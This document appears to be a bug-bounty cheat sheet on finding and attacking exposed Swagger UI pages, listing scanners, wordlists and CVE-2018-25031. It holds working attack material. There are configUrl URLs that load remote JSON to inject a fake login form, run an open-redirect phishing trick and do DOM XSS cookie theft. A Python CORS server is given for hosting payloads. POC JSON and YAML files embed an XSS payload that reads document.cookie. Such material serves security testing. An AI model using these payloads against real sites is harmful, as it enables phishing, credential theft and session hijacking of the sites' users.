Swagger UI

Exploit Swagger

Nuclei template

nuclei-templates/Swagger.yaml at main · coffinxp/nuclei-templatesGitHub

swagger/Swagger.yaml at main · coffinxp/swaggerGitHub

Find Exposed Swagger

GitHub - brinhosa/apidetector: APIDetector: Efficiently scan for exposed Swagger endpoints across web domains and subdomains. Supports HTTP/HTTPS, multi-threading, and flexible input/output options. Ideal for API security testing.GitHub

Wordlist

https://example.com/swagger.yaml
https://example.com/swagger.json
https://example.com/api-docs
https://example.com/v2/api-docs (Swagger 2.0)
https://example.com/v3/api-docs (OpenAPI 3)

https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/swagger.txtgithub.com

swagger/swagger-wordlist.txt at main · coffinxp/swaggerGitHub

OSINT

GitHub - UndeadSec/SwaggerSpy: Automated OSINT on SwaggerHubGitHub

Audit endpoints

GitHub - BishopFox/sj: A tool for auditing endpoints defined in exposed (Swagger/OpenAPI) definition files.GitHub

REST API

Burp Extension

Parse OpenAPI documentation using the OpenAPI Parser BApp

OpenAPI Parserportswigger.net

Get versions and their vulnerabilities.

GitHub - ArcHound/swagger-ui-detector: Swagger-ui scanner - get versions and their vulnerabilities.GitHub

Find old versions of Swagger-ui vulnerable to various XSS attacks - XSSwagger

GitHub - vavkamil/XSSwagger: A simple Swagger-ui scanner that can detect old versions vulnerable to various XSS attacksGitHub

CVE-2018-25031

Swagger UI 4.1.2 and earlier could allow a remote attacker to conduct spoofing attacks.

Swagger UI 4.1.3 - User Interface (UI) Misrepresentation of Critical InformationExploit Database

Hacking Swagger-UI - from XSS to account takeoversVidoc Security Lab

How I was able to steal users credentials via Swagger UI DOM-XSSMedium

Test: /api/docs/?configUrl=https://jumpy-floor.surge.sh/test.json

Repo

GitHub - coffinxp/swaggerGitHub

Found Swagger try each of the file of the repo

# HTML Injection - Display a login form
http://target.com/api/swagger/ui/index?configUrl=https://raw.githubusercontent.com/coffinxp/swagger/refs/heads/main/login.json
# Phishing method - Open Redirect - If the victim click on evil.com
http://target.com/api/swagger/ui/index?configUrl=https://raw.githubusercontent.com/coffinxp/swagger/refs/heads/main/rlogin.json
# DOM XSS
http://target.com/api/swagger/ui/index?configUrl=https://raw.githubusercontent.com/coffinxp/swagger/refs/heads/main/xsscookie.json
http://target.com/api/swagger/ui/index?configUrl=https://raw.githubusercontent.com/coffinxp/swagger/refs/heads/main/xsstest.json

Cookie Stealing

Server with CORS Header

from http.server import SimpleHTTPRequestHandler
import socketserver
class CORSRequestHandler(SimpleHTTPRequestHandler):
 def end_headers(self): 
 self.send_header('Access-Control-Allow-Origin', '*') 
 self.send_header('Access-Control-Allow-Methods', 'GET, OPTIONS') 
 super().end_headers()
if name == "__main__":
 PORT = 80 
 with socketserver.TCPServer(("", PORT), CORSRequestHandler) as httpd: 
 print("Serving at port", PORT) 
 httpd.serve_forever()

POC: test.json

{ 
    "url": "http://IP/test.yaml", 
    "urls": [ 
    { 
    "url": "http://IP/test.yaml", 
    "name": "Foo" 
    } 
    ]
}

POC: test.yaml

swagger: '2.0'
info:
 title: XSS Attack BY 0xss0rz
 description: | 
    <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert(document.cookie) src=1>"></form> 
 version: production
basePath: /JSSResource/
produces:
 - application/xml
 - application/json
consumes:
 - application/xml
 - application/json
security: - basicAuth: []
paths:
 /M0X0101:
  get:
   responses:
    '200':
     description: No response was specified
   tags: - XSS_D 
   operationId: findAccounts
   summary: Finds all accounts 
 '/hack/hachid/{id}':
  delete:
   parameters:
    - description: |
       <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert(document.cookie) src=1>"></form>
      format: int64 
      in: path 
      name: id 
      required: true 
      type: integer 
   responses:
    '200':
      description: No response was specified

Could lead to CSS exfiltration

GitHub - tarantula-team/CSS-injection-in-Swagger-UI: CSS injection vulnerability in Swagger UIGitHub

Postman / Scanner

How to export swagger.json (or yaml)Stack Overflow

http://url/swagger/docs/v1
http://url/<contextPath>/v3/api-docs # JSON file

or check source code:

const ui = SwaggerUIBundle({
  url: "https://petstore.swagger.io/v2/swagger.json",     // <-------
  dom_id: '#swagger-ui',

or dev tool

curl -o swagger.yaml https://example.com/swagger.yaml

If the swagger is a json file use yq to convert it: pip install yq or apt install yq

curl -s https://example.com/swagger.json | yq -P > swagger.yaml

You can now import the yaml file inside Postman or use it in scanner like Zap

Postman UsageZAP Scanner & other scanning methods

SOAPi

GitHub - andrei8055/SOAPI: SOAPI - The OpenAPI Documentation ScannerGitHub

Other Scanners

Tools & Scanners

Interesting Books

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

• Hacking APIs: Breaking Web Application Programming Interfaces A crash course in web API security testing that will prepare you to penetration-test APIs, reap high rewards on bug bounty programs, and make your own APIs more secure.

• Black Hat GraphQL: Attacking Next Generation APIs This hands-on book teaches penetration testers how to identify vulnerabilities in apps that use GraphQL, a data query and manipulation language for APIs adopted by major companies like Facebook and GitHub.

Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.